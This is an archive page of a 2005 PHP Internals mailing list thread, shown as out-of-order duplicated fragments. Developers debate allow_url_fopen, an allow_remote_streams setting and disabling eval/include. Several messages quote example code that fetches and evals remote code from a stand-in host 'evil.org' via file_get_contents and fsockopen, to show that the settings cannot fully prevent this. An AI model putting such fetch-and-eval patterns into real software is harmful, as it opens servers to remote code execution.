Since comments comments were called for I thought I might weigh in
with my $0.02cdn
When configuring PHP I want a way to protect myself, and my users from
themselves when it comes to doing something silly, I've actually seen
include($_GET['function']) in running code, though thankfully never on
on
On 7/28/05, Sean Coates <[EMAIL PROTECTED]> wrote:
> >> That won't work, eval() is not a function...
> >
> > Ah yes, you're right... I guess we do need another INI setting.
>
> Or constructs-that-look-like-functions could be governed by
> disable_functions (eval, echo).. that would cause other pro
Ilia Alshanetsky wrote:
IMHO we should restrict or "disabling" code to just the
include/require constructs, since that is the main cause for concern.
Ultimately shy of disabling php's ability to request remote files
there is no way to prevent an attacker from fetching remote code and
then
At 04:52 PM 7/28/2005, Ilia Alshanetsky wrote:
It can already be done, disable_functions INI directive.
That won't work, eval() is not a function...
Zeev
--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
sure: eval('file_get_contents("http://evil.org";);');
Ok, but there is nothing (allow_url_fopen does not work here) preventing
me from doing similar via:
$fp = fsockopen("evil.org", 80);
$fp = fwrite($fp, "GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n");
eval(stream_get_contents($fp)
Zeev Suraski wrote:
At 04:43 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens
renamed, except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file base
At 04:43 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens renamed,
except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file based functions and a like (
Zeev Suraski wrote:
I don't know, I think that if you aim that well you should be allowed to
shoot yourself in the foot :) If we go that far, then running code
from the database through eval() should also not be allowed, because it
may have been indirectly written to by remote users. Which b
On Jul 28, 2005, at 9:49 AM, Ilia Alshanetsky wrote:
sure: eval('file_get_contents("http://evil.org";);');
Ok, but there is nothing (allow_url_fopen does not work here)
preventing me from doing similar via:
$fp = fsockopen("evil.org", 80);
$fp = fwrite($fp, "GET /evil_code.txt HTTP/1.0\
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Or constructs-that-look-like-functions could be governed by
disable_functions (eval, echo).. that would cause other problems (like a
disabled "return"), though.
S
--
PHP Internals
Zeev Suraski wrote:
At 04:52 PM 7/28/2005, Ilia Alshanetsky wrote:
It can already be done, disable_functions INI directive.
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Ilia
--
PHP Internals - PHP Runtime Development Mailing
At 04:39 PM 7/28/2005, George Schlossnagle wrote:
sure: eval('file_get_contents("http://evil.org";);');
You could say this is just bad policy on the part of code authors,
but that's what these options were geared to handle in the first
place, right?
I don't know, I think that if you aim that
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens
renamed, except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file based functions and a like (like allow_url_fopen now) or
will it also inclu
On Jul 28, 2005, at 9:28 AM, Zeev Suraski wrote:
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply pr
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data sources
directly.
W
On Jul 28, 2005, at 9:21 AM, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources di
On Jul 28, 2005, at 9:10 AM, Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly ca
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly can you do with it other than query
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data sources
directly.
What exactly can you do with it other than query remote data sources?
I
Adam Maccabee Trachtenberg wrote:
I pretty much take it for granted that people are going to need to
fetch the WSDL file from a remote location.
Not to mention do anything useful with it, like run queries :-)
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is
On Wed, 27 Jul 2005, Sara Golemon wrote:
> (B) I don't think SOAP is one of those cases. I would be dissapointed if
> SOAP allowed *any* calls to be made when allow_url_fopen is off.
I pretty much take it for granted that people are going to need to
fetch the WSDL file from a remote location.
A
Two answers:
(A) I do think an override is a good idea. There may be some cases where
extension code may need to hook a wrapper whether allow_url_fopen is enabled
or not. Granted the code could temporarily change that value, but that's a
hackish approach.
(B) I don't think SOAP is one of thos
22 matches
Mail list logo
